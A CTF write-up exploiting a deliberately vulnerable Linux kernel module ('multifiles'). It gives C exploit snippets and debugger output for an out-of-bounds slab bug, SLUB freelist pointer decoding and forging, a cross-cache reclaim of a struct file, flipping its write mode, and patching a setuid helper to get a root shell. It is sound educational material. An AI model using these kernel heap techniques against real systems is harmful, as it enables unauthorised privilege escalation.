b01lers ctf 2026: kernel pwn (part 2)

18 May, 2026

Intro

Previously I wrote a writeup on the first kernel challenge from this CTF — if you haven’t read it yet, I recommend starting with Part 1.

This post covers multifiles, the second kernel pwn challenge.

Since I’m releasing this a bit late: in Part 1 I reimplemented the exploit from scratch in Rust to cover every step, but this time you’ll get a refactored version of the original C exploit instead.

multifiles

download

Recon

 1.
 2├── build_out
 3│   ├── bzImage
 4│   ├── initrd.cpio.gz
 5│   ├── kernel.config
 6│   ├── multifiles.ko
 7│   └── System.map
 8├── deploy
 9│   ├── docker-compose.prod.yml
10│   ├── docker-compose.yml
11│   ├── Dockerfile
12│   ├── Dockerfile_build
13│   └── wrapper.sh
14├── dev.sh
15├── pwn_build.sh
16├── README.md
17└── src
18    ├── drop_priv.c
19    ├── initrd_init
20    ├── kernel-cache-usercopy.diff
21    ├── kernel.config.fragment
22    ├── Makefile
23    └── multifiles.c
24
254 directories, 19 files

Based on deploy/wrapper.sh, I assembled a local run script:

1#!/bin/sh
2qemu-system-x86_64 \
3   -nodefaults -m 256M -nographic \
4   -kernel ~/multifiles/build_out/bzImage \
5   -initrd ~/multifiles/build_out/initrd.cpio.gz \
6   -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \
7   -cpu qemu64,+smep,+smap \
8   -smp 1 -no-reboot -serial stdio -monitor none

The VM boots successfully.

 1[multifiles] booting challenge initrd
 2==============================
 3 multifiles kernel challenge
 4==============================
 5Device: /dev/multifiles
 6Flag:   /root/flag.txt (root only)
 7User:   ctf (uid=1000)
 8==============================
 9
10
11BusyBox v1.35.0 (Debian 1:1.35.0-4+b7) built-in shell (ash)
12Enter 'help' for a list of built-in commands.
13
14sh: can't access tty; job control turned off
15~ $

Read sources

drop_priv and initrd_init follow the same pattern as Part 1. Here we have a target kernel module and a small patch to the kernel itself.

Let’s go through the interesting source files.

kernel-cache-usercopy.diff adds kmem_cache_copy_from_user / kmem_cache_copy_to_user — wrappers around copy_from/to_user that first verify the destination/source object belongs to a specific slab cache before performing the copy:

 1+/**
 2+ * kmem_cache_copy_from_user - Copy from userspace into an object from a cache
 3+ * @cachep: The cache the destination object must belong to.
 4+ * @to: Destination address in kernel memory.
 5+ * @from: Source address in userspace.
 6+ * @n: Number of bytes to copy.
 7+ *
 8+ * This wraps copy_from_user(), but first verifies that @to lives in a slab
 9+ * belonging to @cachep. The subsequent copy_from_user() call performs the
10+ * normal hardened usercopy heap validation for the destination range.
11+ *
12+ * Return: number of bytes not copied, like copy_from_user().
13+ */

From kernel.config.fragment, note the slab configuration:

CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_SLAB_FREELIST_RANDOM=n

FREELIST_HARDENED encodes freelist pointers (next ^ secret ^ bswap64(slot_addr)), making them not trivially readable. FREELIST_RANDOM=n means the freelist order within a slab page is deterministic — useful for reliable object placement. If this is unfamiliar, this article is a good reference.

multifiles.c: the init and exit functions are standard boilerplate. The interesting part is the file_operations table:

 1static const struct file_operations multifiles_fops = {
 2    .owner = THIS_MODULE,
 3    .open = multifiles_open,
 4    .release = multifiles_release,
 5    .read = multifiles_read,
 6    .write = multifiles_write,
 7    .llseek = multifiles_llseek,
 8    .unlocked_ioctl = multifiles_ioctl,
 9    #ifdef CONFIG_COMPAT
10    .compat_ioctl = multifiles_ioctl,
11    #endif
12};

Now the data structures the module operates on:

 1#define TYPE_FILE 1
 2
 3// this should be the only flags needed. should not be leaked to userspace
 4#define DEFAULT_FLAGS 0x7d333a7b66746362
 5
 6#define NAME_SIZE 16
 7#define DATA_COUNT 16
 8#define MAX_RW_SIZE 64
 9
10typedef struct {
11    u64 type;
12    u64 flags;
13    char name[NAME_SIZE];
14    u64 data[DATA_COUNT];
15} MultiFile;
16
17#define NUM_SLOTS 67
18
19typedef struct {
20    struct mutex lock;
21    MultiFile *files[NUM_SLOTS];
22    u32 active_idx;
23} MultiFileList;
24
25typedef struct {
26    char name[16];
27} MultiFileCreateReq;

A few things to note from this:

MultiFile is 0xa0 bytes (0x10 header of type+flags + 0x10 name + 0x80 data). These are the objects allocated from multifiles_cache, one per ioctl(CREATE).
Each open() allocates one MultiFileList (stored in file->private_data), which holds up to NUM_SLOTS = 67 MultiFile pointers in files[]. So a single fd can keep up to 67 live objects, and the index returned by CREATE is just the slot in this per-fd array. active_idx selects which slot read/write operate on.
DEFAULT_FLAGS = 0x7d333a7b66746362 is set on every freshly created MultiFile, and the source explicitly comments it should not be leaked to userspace. In ASCII that’s bctf{:3} — a deliberate canary. Note where it lives: offset 0x08, inside the type+flags header. As we’ll see, the cache’s usercopy region starts at name (0x10), so this header sits outside what copy_to/from_user is allowed to touch — which is exactly what stops us from leaking it directly.

Vulnerabilities

Looking at multifiles_read:

 1  150  static ssize_t multifiles_read(struct file *self, char __user *buf, size_t count, loff_t *offset) {
 2  151      MultiFileList *list = self->private_data;
 3  152      ssize_t ret = 0;
 4  153      if (list == NULL) {
 5  154          return -EINVAL;
 6  155      }
 7  156
 8  157      mutex_lock(&list->lock);
 9  158
10  159      // check index is selected
11  160      MultiFile *multi_file = get_active_file(list);
12  161      if (multi_file == NULL) {
13  162          ret = -ENOENT;
14  163          goto out_unlock;
15  164      }
16  165
17  166      // check read bounds
18  167      if (
19  168          count > MAX_RW_SIZE
20  169          || (count % sizeof(u64)) != 0
21  170          || *offset >= sizeof(MultiFile)
22  171          || *offset < 0
23  172      ) {
24  173          ret = -EINVAL;
25  174          goto out_unlock;
26  175      }
27  176
28  177      loff_t old_offset = *offset;
29  178      *offset += count;
30  179
31  180      if (kmem_cache_copy_to_user(
32  181          multifiles_cache,
33  182          buf,
34  183          ((u8 *) &multi_file->data[0]) + old_offset,
35  184          count
36  185      ) != 0) {
37  186          ret = -EFAULT;
38  187          goto out_unlock;
39  188      }
40  189
41  190      ret = count;
42  191
43  192  out_unlock:
44  193      mutex_unlock(&list->lock);
45  194      return ret;
46  195  }

multifiles_write is similar.

The bounds check validates offset against sizeof(MultiFile) = 0xa0, but the actual copy base is &multi_file->data[0] + offset = obj+0x20+offset. So at offset=0x80 the copy starts at obj+0xa0 — exactly the first byte of the next adjacent slab object.

Now multifiles_llseek:

 1  244  loff_t multifiles_llseek(struct file *self, loff_t offset, int whence) {
 2  245      MultiFileList *list = self->private_data;
 3  246      if (
 4  247          list == NULL
 5  248          // too lazy to support other types
 6  249          || whence != SEEK_SET
 7  250          || offset >= sizeof(MultiFile)
 8  251          || offset < 0
 9  252      ) {
10  253          return -EINVAL;
11  254      }
12  255
13  256      mutex_lock(&list->lock);
14  257      self->f_pos = offset;
15  258      mutex_unlock(&list->lock);
16  259
17  260      return offset;
18  261  }

llseek lets us set f_pos (the file position) to any value in [0, 0xa0). Combined with the mismatched copy base, this gives a controlled OOB window into the next adjacent slab object.

It’s worth being precise about why f_pos is the same thing as the loff_t *offset that multifiles_read/multifiles_write receive. When userspace calls read(fd, buf, n), the VFS path ksys_read() (in fs/read_write.c) does roughly:

1loff_t pos = file_pos_read(file);     // copy of file->f_pos
2vfs_read(file, buf, n, &pos);         // -> file->f_op->read(file, buf, n, &pos)
3file_pos_write(file, pos);            // write the (advanced) position back

So the loff_t *offset argument handed to the driver is a pointer to a copy of file->f_pos, and after the op the kernel writes it back (which is why a normal read advances the position). multifiles_llseek sets file->f_pos directly. Net effect: lseek() followed by read()/write() lets us pick exactly where the driver’s copy starts — including the OOB window [0x80, 0x9f].

Primitives

Controlled OOB read/write: By setting f_pos via llseek to a value in [0x80, 0x9f], read()/write() will copy from/to obj+0x20+offset, which lands in the next adjacent slab object. Up to 64 bytes (MAX_RW_SIZE) per operation, 8-byte aligned (count % sizeof(u64) == 0).

Arbitrary position within object: llseek allows resetting f_pos to any value in [0, 0x9f], giving full control over where within the object (or OOB window) the next read/write lands.

Multiple independent file descriptors: Each open() on /dev/multifiles gets its own MultiFileList with its own 67 slots and its own f_pos. Objects in one fd’s list can be adjacent in the slab to objects from another fd’s list, enabling cross-fd OOB access.

Exploitation

Before diving in, here’s the whole plan:

Validate the OOB. Confirm a slot can read its neighbor through the base-vs-bounds mismatch.
Leak the heap. Decode page_base and cache_random from encoded freelist words on a full slab page.
Forge a freelist pointer. With the secret known, poison a freed object’s next to a chosen address.
Find contiguous pages. Locate two physically adjacent slab pages A, B == A+0x1000.
Build a page-end fake object. Poison A’s tail so a fresh object lands at A+0xfc0 and straddles into B.
Cross-cache reclaim. Drain B back to the buddy allocator and let a struct file for /bin/drop_priv take its place.
Patch and respawn. Flip the file’s f_mode write bits through the straddle, pwrite the binary, and let init rerun it as root.

Primitive validation

The exploit is built on a thin layer of wrappers over the driver ABI:

1int  mf_open(void);                          // open("/dev/multifiles", O_RDWR)
2int  mf_create(int fd, const char *name);    // ioctl(CREATE) -> slot index
3void mf_set_active(int fd, uint32_t idx);    // ioctl(SET_ACTIVE)
4void mf_delete(int fd, uint32_t idx);        // ioctl(DELETE)
5// select idx, lseek(fpos, SEEK_SET), then read len bytes (len % 8 == 0, <= 64)
6void mf_read(int fd, uint32_t idx, off_t fpos, void *buf, size_t len);

Note mf_read folds set_active + lseek + read into one call, so fpos is exactly the f_pos the driver will use as its copy offset.

For now let’s work within a single file descriptor and validate the OOB primitive.

 1int main(void) {
 2    int fd = mf_open();
 3    int a0 = mf_create(fd, "a0");
 4    int a1 = mf_create(fd, "a1");
 5    int a2 = mf_create(fd, "a2");
 6    printf("[*] created slots: a0=%d a1=%d a2=%d\n", a0, a1, a2);
 7
 8    printf("[*] press enter to set_active(%d)...\n", a0);
 9    getchar();
10
11    mf_set_active(fd, a0);
12    printf("[*] active = %d\n", a0);
13
14    return 0;
15}

multifiles_set_active is static and gets inlined into multifiles_ioctl, so there is no standalone symbol to break on. Set a breakpoint at multifiles_ioctl (.text+0x2f0) and step into the SET_ACTIVE branch from the switch.

 1gef> x/4gx $r12+0x20      # MultiFileList->files[]: three objects, 0xa0 apart
 20xffff8880038d7020:     0xffff888003989000      0xffff8880039890a0
 30xffff8880038d7030:     0xffff888003989140      0x0000000000000000
 4gef> telescope *(void**)($r12+0x20) -n
 5      0xffff888003989000|+0x0000|+000: 0x0000000000000001
 6      0xffff888003989008|+0x0008|+001: 0x7d333a7b66746362 'bctf{:3}a0'
 7      0xffff888003989010|+0x0010|+002: 0x0000000000003061 ('a0'?)
 8      ...
 9      0xffff8880039890a0|+0x00a0|+020: 0x0000000000000001
10      0xffff8880039890a8|+0x00a8|+021: 0x7d333a7b66746362 'bctf{:3}a1'
11      0xffff8880039890b0|+0x00b0|+022: 0x0000000000003161 ('a1'?)
12      ...
13      0xffff888003989140|+0x0140|+040: 0x0000000000000001
14      0xffff888003989148|+0x0148|+041: 0x7d333a7b66746362 'bctf{:3}a2'
15      0xffff888003989150|+0x0150|+042: 0x0000000000003261 ('a2'?)
16      ...

Leaking the flag — and the hardened usercopy wall

The obvious first target is that bctf{:3} canary in flags. A freshly created neighbor has flags at offset 0x08, so let’s point the OOB read at the neighbor’s header: f_pos=0x80 makes the copy start at obj+0xa0 = the neighbor’s offset 0, which would put its flags in leak[1].

1uint8_t leak[0x40];
2mf_read(fd, a0, 0x80, leak, sizeof(leak)); // copy base obj+0xa0 = neighbor+0x00
3// neighbor flags would land at leak+0x08
4printf("[*] neighbor flags = 0x%llx\n", *(unsigned long long *)(leak + 8));

Running it instantly panics:

 1[   12.567074] usercopy: Kernel memory exposure attempt detected from SLUB object 'multifiles_cache' (offset 0, size 64)!
 2[   12.568300] kernel BUG at mm/usercopy.c:102!
 3[   12.571507] RIP: 0010:usercopy_abort+0x68/0x80
 4[   12.574242] Call Trace:
 5[   12.575606]  __check_heap_object+0x7d/0xa0
 6[   12.575858]  __check_object_size+0x166/0x2b0
 7[   12.575983]  kmem_cache_copy_to_user+0x85/0xe0
 8[   12.576196]  multifiles_read+0xa6/0xc0 [multifiles]
 9[   12.576675]  vfs_read+0xda/0x350
10[   12.576868]  do_syscall_64+0x9e/0x1a0
11[   12.581620] Kernel panic - not syncing: Fatal exception

This is hardened usercopy. Recall the cache is created with kmem_cache_create_usercopy(..., offsetof(MultiFile, name), USERCOPY_SIZE, ...) — useroffset 0x10, usersize 0x90. Only [obj+0x10, obj+0xa0) (name + data) is allowed to cross the user boundary. __check_object_size figures out which slab object our source pointer lands in (the neighbor) and checks the range against its usercopy region. Our copy started at neighbor+0x00, below 0x10, so it aborts — “offset 0, size 64”.

The takeaway is a hard constraint on the primitive: the OOB copy must start at neighbor+0x10 or later, i.e. f_pos >= 0x90. The header — type, flags, and (once the object is freed) the freelist pointer at offset 0 — is all unreachable this way. So the bctf{:3} canary cannot be leaked directly; it lives in the header precisely so hardened usercopy guards it.

Pointing the read at the neighbor’s name instead works cleanly (f_pos=0x90 → start obj+0xb0 = neighbor+0x10):

1// usercopy region is [name(0x10), 0xa0); copy must start at >= neighbor+0x10
2uint8_t leak[0x40];
3mf_read(fd, a0, 0x90, leak, sizeof(leak)); // copy base obj+0xb0 = neighbor->name
4printf("[*] neighbor name = 0x%llx ('%.16s')\n",
5       *(unsigned long long *)leak, (char *)leak);

1[*] neighbor name = 0x3161 ('a1')

0x3161 is "a1" — the name we gave the second object — confirming slot 0 and slot 1 are adjacent and the OOB read works. The primitive is validated, with the constraint baked in: we can only see [neighbor+0x10, neighbor+0xa0) (name + data).

Free the chunk

Let’s free the neighbor (mf_delete) and look at what SLUB leaves behind.

Dumping the freed object (shown here in gdb at its real address; everything in [0x10, 0xa0) is also reachable through our OOB read):

 10xffff8880039980a0 +0x00: 0x0000000000000001           type   (NOT cleared on free)
 20xffff8880039980a8 +0x08: 0x7d333a7b66746362  bctf{:3}  flags  (NOT cleared)
 30xffff8880039980b0 +0x10: 0x0000000000003161  "a1"      name   (NOT cleared)
 40xffff8880039980b8 +0x18: 0x0000000000000000
 50xffff8880039980c0 +0x20: 0x0000000000000000           data[0]
 6   ...
 70xffff8880039980f0 +0x50: 0x76bb00d4c7d73040  <-- freelist pointer
 80xffff8880039980f8 +0x58: 0x0000000000000000
 9   ...
100xffff888003998140 +0xa0: 0x0000000000000001           (next object's type)

Two things stand out.

First, SLUB does not zero an object on free — it only writes the freelist pointer. That’s why type, flags (bctf{:3}) and name (“a1”) survive untouched in the freed chunk.

Second, the freelist pointer sits at offset 0x50, not 0. That’s sizeof(MultiFile) / 2, the result of the “relocate freelist pointer to the middle of the object” hardening. Crucially 0x50 falls inside [0x10, 0xa0) — the usercopy region — so unlike the 0x00 header, we can both read and write the freelist pointer through the OOB primitive.

Why does the value (0x76bb00d4c7d73040) look like garbage? CONFIG_SLAB_FREELIST_HARDENED mangles it:

fp = next ^ s->random ^ bswap64(&slot)

where &slot is the address of the pointer itself (obj+0x50), next is the next free object in the list, and s->random is a per-cache secret. A single read is one equation with three unknowns — we can’t naively decode it, nor forge an arbitrary pointer to write back.

Reading it through the OOB primitive

The dump above is gdb at the object’s real address; in the exploit we only have read(). To pull neighbor+0x50 into a 64-byte copy window the copy has to start at or before it: f_pos=0x98 sets the base to obj+0xb8 = neighbor+0x18, and a 0x40-byte read spans neighbor[0x18, 0x58), so the encoded word at neighbor+0x50 lands at leak+0x38.

We also need the neighbor to actually be free — otherwise +0x50 is just zeroed data — and we want its next to be a value we can reason about. So allocate three adjacent objects and free the last two. SLUB’s per-cpu freelist is LIFO, so freeing b2 then b1 leaves b1->next == b2:

 1int b0 = mf_create(fd, "b0");
 2int b1 = mf_create(fd, "b1");
 3int b2 = mf_create(fd, "b2");
 4
 5mf_delete(fd, b2);   // free b2 first
 6mf_delete(fd, b1);   // then b1  ->  b1->next == b2, freeptr written at b1+0x50
 7
 8uint8_t leak[0x40];
 9mf_read(fd, b0, 0x98, leak, sizeof(leak));   // window b1[0x18, 0x58)
10
11uint64_t enc;
12memcpy(&enc, leak + 0x38, sizeof(enc));      // b1+0x50
13printf("[+] encoded freelist ptr @ b1+0x50 = 0x%016llx\n",
14       (unsigned long long)enc);

1[+] encoded freelist ptr @ b1+0x50 = 0x4b89a339485018db

That 0x4b89a339485018db is b2 ^ s->random ^ bswap64(b1+0x50) — kernel-controlled metadata, not the name bytes we picked. Reading (and writing) +0x50 is now a real code primitive, not just a gdb observation.

What the membership check rules out

Before building on the freelist pointer, look at the custom gate every copy goes through (kernel-cache-usercopy.diff):

1static bool kmem_cache_has_object(struct kmem_cache *cachep, const void *ptr) {
2	struct slab *slab = virt_to_slab(ptr);
3	return slab && slab->slab_cache == cachep;
4}

This is a per-slab-folio check: it resolves the page ptr lives in and requires slab->slab_cache == multifiles_cache. The consequence for a cross-cache plan: if we drain a multifiles slab page back to the buddy allocator and let another cache (say filp_cachep) reclaim it, that page’s slab_cache is no longer multifiles_cache, so any OOB read/write through multifiles_read/write fails the check. We cannot OOB-read a reclaimed struct file directly — the naive “cross-cache then read the foreign object” approach is dead on arrival.

So the workable primitive is the freelist pointer we can read and write at +0x50. The remaining problem is weaponizing it under the hardening: either leak s->random + a heap address, or use a poisoning trick that cancels both (page-relative deltas XOR out the page base and the secret). That’s the next step.

Decoding the freelist pointer

Primary source

The encoding lives in freelist_ptr_encode() in mm/slub.c (v6.12):

 1static inline freeptr_t freelist_ptr_encode(const struct kmem_cache *s,
 2                    void *ptr, unsigned long ptr_addr)
 3{
 4    unsigned long encoded;
 5#ifdef CONFIG_SLAB_FREELIST_HARDENED
 6    encoded = (unsigned long)ptr ^ s->random ^ swab(ptr_addr);
 7#else
 8    encoded = (unsigned long)ptr;
 9#endif
10    return (freeptr_t){.v = encoded};
11}

and set_freepointer() fixes ptr_addr to the storage slot itself:

1unsigned long freeptr_addr = (unsigned long)object + s->offset;
2*(freeptr_t *)freeptr_addr = freelist_ptr_encode(s, fp, freeptr_addr);

s->offset is 0x50 for our cache, swab on a 64-bit value is bswap64, so for an object at base O:

1E(O) = next(O) ^ s->random ^ bswap64(O + 0x50)

One word is one equation in three unknowns — next, s->random, and O (which hides the unknown page base). We kill two of them with two XOR cancellations.

Two cancellations

XOR two words to cancel random. It’s one per-cache constant, so E(A) ^ E(B) drops it.
Same-page bswap cancels the page base. bswap64(a) ^ bswap64(b) = bswap64(a ^ b), and for two freeptr slots on the same 4K page a ^ b is just the low-bits delta — the page base is identical in both and cancels. We don’t know the address, but we know the distance.

Layout

0x1000 / 0xa0 = 25 objects per page (0x60 tail padding). On a pristine page allocations climb by address, so O_i = page + i*0xa0. We use three of them:

O_20 = page+0xc80   slot page+0xcd0
O_22 = page+0xdc0   slot page+0xe10
O_24 = page+0xf00   slot page+0xf50   (last object on the page)

To read E(O_i) we OOB-read from its live left neighbor O_{i-1} (f_pos=0x98, word at leak+0x38), so we keep odd indices alive and free even ones. Fill the page completely, then free 24, 22, 20 in that order — the per-cpu freelist is LIFO and a full page starts with an empty freelist, so:

free 24:  next(O_24) = NULL
free 22:  next(O_22) = O_24
free 20:  next(O_20) = O_22

Recovering page base and random

slot24 ^ slot22 = 0xf50 ^ 0xe10 = 0x140, and bswap64(0x140) = 0x4001000000000000. With e24/e22/e20 read from O_23/O_21/O_19:

1// e24 = NULL ^ R ^ bsw(page+0xf50)
2// e22 = O_24 ^ R ^ bsw(page+0xe10)   (O_24 = page+0xf00)
3uint64_t O24    = e22 ^ e24 ^ 0x4001000000000000ULL; // R and page base both cancel
4uint64_t page   = O24 - 0xf00;
5uint64_t random = e24 ^ bsw(page + 0xf50);           // e24 = R ^ bsw(slot24)
6
7// cross-check: decode O_20 -> next must be O_22
8if ((e20 ^ random ^ bsw(page + 0xcd0)) != page + 0xdc0)
9    die("decode cross-check failed");

Running it:

1[~] decode
2[+] page_base    = 0xffffa30441994000
3[+] cache_random = 0x0f2dff77be715bcc

page_base is 0x1000-aligned and lands in the direct map — but note it is not the textbook 0xffff8880...; this kernel has direct-map KASLR, which is exactly why we never hardcode a base and validate with the cross-check (next(O_20) == O_22) instead. With s->random in hand the encoding is fully invertible: we can decode any freelist word, and — more usefully — forge one as target ^ random ^ bswap64(&slot).

Practical note. The 25-object fill must land on a pristine page for O_i = page + i*0xa0 to hold, so in the exploit decode runs first on a dedicated fd, before any other CREATE, and refills the three freed slots afterwards so the later stages start on a clean page.

Poisoning the freelist

With s->random and a heap base we can run the encoding backwards: to make slot S hold an encoded pointer to target, write target ^ random ^ bswap64(S). The plan is to overwrite a freed object’s +0x50 so the freelist leads to an address we picked — then two CREATEs hand it back as a fresh MultiFile.

Target. page + 0xfc0. A 0xa0 object placed there spans [page+0xfc0, page+0x1060) — the last 0x40 bytes of this page plus the first 0x60 of the next physical page. 0xfc0 sits in the page’s tail padding, and the object’s start is still on a multifiles page, so the membership check and hardened usercopy both stay happy. That straddle is what later becomes a cross-page primitive.

Where we poison. The freed object F has to be the current cpu-slab freelist head and at a known address. page0 from the leak fits both: right after decode it is full and still the cpu slab, and F = page + 12*0xa0 (slot 0x7d0) has a known address. Freeing it pushes it to the cpu freelist with F->next == NULL.

Writing +0x50. Same window as the read, other direction: from the live left neighbor F-1 at f_pos=0x98 the copy lands on F[0x18, 0x58), so we read it, splice the forged word in at leak+0x38, and write it back.

 1uint32_t F      = 12;                     // F = page + 12*0xa0
 2uint64_t F_slot = page + 12*0xa0 + 0x50;  // page+0x7d0
 3uint64_t target = page + 0xfc0;
 4
 5mf_delete(fd, F);                         // F -> cpu freelist head, F->next == NULL
 6
 7uint64_t enc = target ^ random ^ bsw(F_slot);   // forge
 8mf_read (fd, F - 1, 0x98, leak, sizeof(leak));
 9memcpy(leak + 0x38, &enc, 8);
10mf_write(fd, F - 1, 0x98, leak, sizeof(leak));
11
12// read it back and decode -> must equal target
13mf_read(fd, F - 1, 0x98, leak, sizeof(leak));
14memcpy(&enc, leak + 0x38, 8);
15uint64_t decoded = enc ^ random ^ bsw(F_slot);

1[~] poison
2[+] F+0x50 decodes to 0xffff896f419bafc0 (target 0xffff896f419bafc0)

The freelist now reads F -> page+0xfc0: the next CREATE pops F, and the one after pops page+0xfc0. We stop one step short of actually allocating it — popping page+0xfc0 sets the cpu freelist head to whatever garbage sits at *(page+0x1010), so doing it is a one-way door. Instead we re-encode NULL back into F+0x50 and consume F, leaving page0 full and the cache clean. The next step is to make sure that straddle reaches a page we actually own.

Finding contiguous pages

Allocating the fake object isn’t free: CREATE uses kmem_cache_zalloc, which zeroes 0xa0 bytes from page+0xfc0 — and 0x60 of those land in the next physical page. We then read and write that straddle window. So the page at page+0x1000 can’t be arbitrary kernel memory; it has to be a slab page we own, or we corrupt something random and (best case) panic. So before allocating anything at a page tail we first locate a pair of physically adjacent multifiles pages A, B with B == A + 0x1000.

cache_random makes this cheap. The base of any full page falls out of a single NULL-terminated freeptr: free the page’s last object (pos24, at base+0xf00) and its next becomes NULL, so the encoded word is just random ^ bswap64(base+0xf50). Read it through the live pos23 and invert:

1// free pos24 -> next == NULL; read its freeptr via the live pos23
2mf_delete(fds[last/PERFD], last%PERFD);
3mf_read (fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
4memcpy(&enc, leak + 0x38, 8);
5uint64_t base = bsw(enc ^ random) - 0xf50;   // pos24+0x50 = bsw(enc^random)

Right after decode/poison the cache holds nothing but the full page0, so a plain sequential spray lays down fresh pages page1, page2, … in allocation order — object gi sits at scan_page(gi/25) + (gi%25)*0xa0. We spray SCAN_PAGES of them, decode every base, and look for B == A + 0x1000:

1[~] root
2[+] A=0xffff9de3419c2000  B=0xffff9de3419c3000

The buddy allocator hands out order-0 pages from contiguous runs often enough that a few dozen are almost always enough to contain an adjacent pair. A is the page whose tail object we’ll poison; B is the page the fake object reaches into.

Allocating the fake object

There’s a snag: A is not the cpu slab. The buddy allocator handed pages out in ascending order, so by the time B exists A is already a deactivated full slab, and a plain CREATE won’t touch it. SLUB’s per-cpu partial list fixes that: freeing A’s tail object turns A partial, and once the current cpu slab runs dry the allocator pulls A back and starts handing out its objects again. So we free pos24, forge its next to A+0xfc0, and CREATE twice — the first pops pos24, the second pops A+0xfc0:

1mf_delete(fds[last/PERFD], last%PERFD);                 // free A's tail
2uint64_t enc = (A + 0xfc0) ^ random ^ bsw(A + 0xf50);   // forge pos24->next
3mf_read (fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
4memcpy(leak + 0x38, &enc, 8);
5mf_write(fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
6
7mf_create(fds[last/PERFD], "reB");        // pops pos24
8int fake = mf_create(fake_store, "pad");  // pops A+0xfc0 -> the fake object

fake is a perfectly legal MultiFile whose body runs off the end of A. Its data starts at A+0xfe0, so data[4] is A+0x1000 = B+0 — the first object on the next page. There’s one rule for using it: the copy has to start on A, or the membership check trips. f_pos=0x1f puts the base at A+0xfff (the last byte of A) and spills the following 0x40 bytes into B, so every B field comes back at buf[1 + offset] — a one-byte shift we just carry around.

That’s the primitive: a controlled read/write into the physical page right after A. Now we make that page hold something worth corrupting.

Reclaiming B as a struct file

B is full of our MultiFiles. To hand its page to another cache we drain it back to the buddy allocator and lean on SLUB’s discard policy. With CONFIG_SLUB_CPU_PARTIAL the per-cpu partial list holds ~10 slabs and the node keeps min_partial = 5 empties; past that, freeing an empty slab discards its page to buddy. So we turn a batch of full pages into empties — 11 to warm the cpu-partial chain, then B plus 9 more to push the discard through:

1for (i = 0; i < WARMUP_EMPTY_PAGES; i++) free_full_page(fds, press[i]);       // 11
2free_full_page(fds, bp);                                                      // B
3for (i = 0; i < TARGET_EMPTY_PAGES - 1; i++) free_full_page(fds, press[11+i]);// 9

Then we poison A’s tail and realize the fake object exactly as before — only now its body straddles into B’s freed physical page. Spraying open("/bin/drop_priv", O_RDONLY|O_NONBLOCK) makes filp_cachep reclaim that page; the first struct file lands at B+0, right under the fake object. After each open we read the straddle window (f_pos=0x1f, so B+x is at buf[1+x]) and test for the file: f_mode is READ|CAN_READ with no WRITE, f_op/f_mapping/f_inode look like kernel pointers, private_data == 0, and f_flags == O_NONBLOCK|O_LARGEFILE.

1[+] B reclaimed as /bin/drop_priv struct file after 188 opens
2    f_mode=0x004a801d f_flags=0x00008800 f_op=0xffffffff95c1acc0

From f_mode to a root shell

vfs_write() gates on the write bits in file->f_mode, and we have a write primitive into that exact struct file, so we OR them in through the straddle window:

1mode |= FMODE_WRITE | FMODE_PWRITE | FMODE_CAN_WRITE;   // at buf[1 + 0x0c]
2mf_write(fake_store, fake, 0x1f, buf, 0x40);

The read-only fd we opened is now writable. /bin/drop_priv just setuid(1000)s and execs a shell, so we only need its two 1000 immediates to become 0. We find them by scanning the binary for the mov edi, 1000 ; call pattern (offsets 0x1514, 0x152f here) and pwrite zeros over them:

1patch_drop_priv_fd(target_fd, poff, npoff);   // pwrite 0x00000000 over each 0x000003e8

Then the handoff. The initrd’s init is an infinite while true; do /bin/drop_priv; done, so we just need the current (uid 1000) shell to exit and the loop re-runs the patched binary. We ptrace the parent shell and rewrite its registers to exit_group(0), pointing rip at a syscall; ret in its vDSO:

1make_parent_exit_zero();   // ATTACH parent; rax=__NR_exit_group, rdi=0, rip=vdso syscall;ret

This needs no privileges: we’re still uid 1000, and same-uid ptrace is unprivileged (CAP_SYS_PTRACE is only for crossing a privilege boundary). The kernel also ships without Yama (CONFIG_SECURITY_YAMA unset), so no ptrace_scope blocks attaching to an ancestor. If it failed, TIOCSTI or just killing the shell would do the same.

No kernel payload, no commit_creds, no KASLR-dependent symbol — just a patched suid-like helper. init respawns the shell through the patched drop_priv, and it comes up root:

 1[~] root
 2[+] A=0xffff9de3419c2000  B=0xffff9de3419c3000
 3[+] drop_priv patch offsets: 0x1514 0x152f
 4[+] B reclaimed as /bin/drop_priv struct file after 188 opens
 5[+] flipped FMODE_WRITE on the read-only struct file
 6    patch[0] off=0x1514 old=0x000003e8
 7    patch[1] off=0x152f old=0x000003e8
 8[+] patched /bin/drop_priv
 9[+] forced parent shell exit(0) -> init respawns a root shell
10/home/ctf # id
11uid=0(root) gid=0(root) groups=0(root)

That’s the whole chain: a base-vs-bounds OOB inside one hardened SLUB cache, turned into a heap leak, a freelist forge, a page-straddling fake object, a cross-cache reclaim, and finally a userland binary patch — bctf{:3} never needed.

Full source code can be found here.

Conclusion

That wraps up both kernel challenges from b01lers 2026. Multifiles was my favorite of the two. Hope it was a useful read.

References

Part 1: throughthewall — the firewall UAF, and the same /bin/drop_priv patch finale from a different write primitive.
KSPP study — protecting heap metadata: how SLAB_FREELIST_HARDENED works.
duasynt — Linux kernel heap feng shui in 2022
sam4k — exploring Linux’s random kmalloc caches
Dirty Pagetable
r1ru — Linux kernel exploitation series

#Kernel #Pwn